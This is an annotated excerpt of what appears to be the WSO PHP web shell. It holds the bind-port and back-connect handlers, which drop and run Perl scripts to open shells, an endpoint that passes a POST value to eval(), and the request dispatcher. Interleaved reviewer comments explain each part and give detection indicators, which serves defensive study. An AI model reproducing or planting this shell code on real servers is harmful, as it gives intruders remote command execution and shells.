 // Two forms: the first submits p1=bpp with a port, the second p1=bcp with a
 // server and a port. The server field is pre-filled with the address of the
 // requesting client and both ports default to 21.
3595 echo "<h1>Back Connect</h1><div class=content><form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"><span>Bind port to /bin/sh [perl]</span><br/>Port: <input type='text' name='port' value='21'> <input type=submit value='>>'></form><form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>Back-connect [perl]</span><br/>Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='21'> <input type=submit value='>>'></form><br>";
 // cf($f,$t) writes the base64-decoded string $t to the path $f. Because the
 // assignment binds tighter than "or", $w receives the fopen() result and the
 // function_exists() call has no effect on it. cf() is declared inside the if,
 // so it only exists for requests that carry p1.
 // bpp branch: drop /tmp/bp.pl, start it with p2 as argument, wait one second,
 // print the command output plus a process listing, then delete the script.
3596if(isset($_POST['p1'])) {function cf($f,$t) {$w = @fopen($f,"w") or @function_exists('file_put_contents');if($w){@fwrite($w,@base64_decode($t));@fclose($w);}}if($_POST['p1'] == 'bpp') {cf("/tmp/bp.pl",$bind_port_p);
3597 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
3598 sleep(1);
3599 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
3600 unlink("/tmp/bp.pl");
3601 }
 // bcp branch: same sequence with /tmp/bc.pl, passing p2 and p3 as arguments.
3602 if($_POST['p1'] == 'bcp') {
3603 cf("/tmp/bc.pl",$back_connect_p);
3604 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
3605 sleep(1);
3606 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
3607 unlink("/tmp/bc.pl");
3608 }
3609 }
3610 echo '</div>';
3611 wsoFooter();
3612}
/**
 * Remote-control endpoint without any HTML output.
 *
 * Without p1 it prints a PHP-serialized array holding uname, PHP version,
 * WSO_VERSION (a constant defined elsewhere in the file) and the safe_mode
 * setting. With p1 it hands the POST value to eval().
 *
 * Reviewer notes (defensive reading of the visible code):
 * - eval() on a request parameter is unrestricted PHP execution in the context
 *   of the web application. No caller check is visible inside this function.
 * - The dispatcher at the end of the file reaches this function for a=RC.
 * - Indicators: a POST with a=RC; a response body that is a bare serialized
 *   array of four elements (it begins with a:4:{) containing the keys uname,
 *   php_version, wso_version and safemode.
 */
3613function actionRC() {
 // No p1: answer with the host fingerprint only.
3614 if(!@$_POST['p1']) {
3615 $a = array(
3616 "uname" => php_uname(),
3617 "php_version" => phpversion(),
3618 "wso_version" => WSO_VERSION,
3619 "safemode" => @ini_get('safe_mode')
3620 );
3621 echo serialize($a);
3622 } else {
 // p1 present: the value is executed as PHP source.
3623 eval($_POST['p1']);
3624 }
3625}
// Request dispatcher. The POST parameter a selects the handler: the string
// "action" is prepended and the resulting function is called when it exists,
// so every function in the file whose name starts with "action" is reachable
// this way. No caller check is visible in these lines; any gate would have to
// run earlier in the file.
// When a is empty, $default_action (not defined in the visible lines) is used
// if a matching function exists, otherwise Home. The else belongs to the
// inner if.
// Detection: POST bodies to a single PHP file carrying a short a parameter
// together with p1, p2, p3 and c are characteristic of this dispatcher.
3626if( empty($_POST['a']) )
3627 if(isset($default_action) && function_exists('action' . $default_action))
3628 $_POST['a'] = $default_action;
3629 else
3630 $_POST['a'] = 'Home';
// Unknown handler names are ignored silently and the script exits.
3631if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
3632 call_user_func('action' . $_POST['a']);
3633exit;
3634?>